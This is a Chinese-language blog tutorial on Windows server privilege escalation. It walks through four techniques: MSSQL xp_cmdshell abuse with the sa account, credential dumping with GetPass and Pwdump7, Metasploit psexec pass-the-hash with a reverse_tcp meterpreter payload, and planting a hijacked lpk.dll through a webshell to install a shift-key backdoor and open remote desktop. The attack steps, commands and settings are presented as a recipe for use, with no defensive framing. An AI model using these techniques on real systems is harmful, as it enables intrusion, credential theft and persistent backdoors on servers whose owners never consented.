提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权

(一)、Mssql提权


必要条件:获取到mssql数据库最高权限用户sa的账号密码


Mssql默认端口:1433

Mssql最高权限用户:sa


提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权_第1张图片


得到sa密码之后,通过工具直接连接上去。


提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权_第2张图片


MSSQL自带了一个XP_CMDSHELL用来执行CMD命令。


(二)、GetPass 提权


一款获取计算机用户账号密码的工具


提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权_第3张图片


(三)、hash传递入侵 msf加载


Hash 算法:windows密码的加密方式

Msf下载:http://www.rapid7.com/products/metasploit/download.jsp


以下使用Kali演示


Msf使用:


msfconsole   //启动终端


提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权_第4张图片


use exploit/windows/smb/psexec //用到模块

show options //查看模块选项属性


提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权_第5张图片


set PAYLOAD windows/meterpreter/reverse_tcp   //设置漏洞利用载体

Show targets //查看模块的攻击目标属性


提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权_第6张图片


set LHOST //设置本机地址
set RHOST 192.168.0.254 //设置属性目标主机地址

set SMBUser administrators //设置属性用户


提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权_第7张图片


set SMBPass  xxx  //设置属性密文hash


目标主机的hash怎么获取了?可以通过Pwdump7这个工具来获取hash值


提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权_第8张图片


复制以下一段就行了


提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权_第9张图片


提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权_第10张图片


exploit  //开始攻击

提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权_第11张图片


获取当前shell,执行命令


提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权_第12张图片




(四)、lpk提权


触发:目录下存在exe文件被执行,他的特点是每个可执行文件运行之前都要加载该文件,windows系统是先判断当前文件目录是否存在此文件,如果目录下存在该文件则执行,如果不存在则会执行system32目录下的dll。


启动方案:3389远程桌面连接启动(连续shift,然后按热键)


提权方案:生成lpk.dll,通过webshell上传至文件目录,等待管理员去触发exe程序。


运行LPK Setch这个工具选择,2键启动,此时的2键3键值为LPK Sethc内置固定的数字,比如65,66就对应a与b。


提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权_第13张图片


然后点击生成,将生成的lpk.dll上传至任意目录,并运行其中的任何一个exe文件,lpk.dll将会自动替换为shift后门。

我这里把它生成到了软件的目录,然后点击运行软件


提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权_第14张图片


然后远程连接,连续按五次shift键,会出现下面的提示


提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权_第15张图片


接着同时按下组合键(也就是在哪里设置的65,66,对应的A,B),就会出现下面的密码框


提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权_第16张图片


输入密码,就会进入下面的界面!!!


提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权_第17张图片


还可以用来执行软件,比如用来开3389,在生成lpk.dll是选中


提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权_第18张图片


生成lpk.dll然后放到任意目录下,未执行软件之前远程是关闭的


提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权_第19张图片


然后执行exe软件,你好发现远程被打开了。


提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权_第20张图片





你可能感兴趣的:(网络渗透)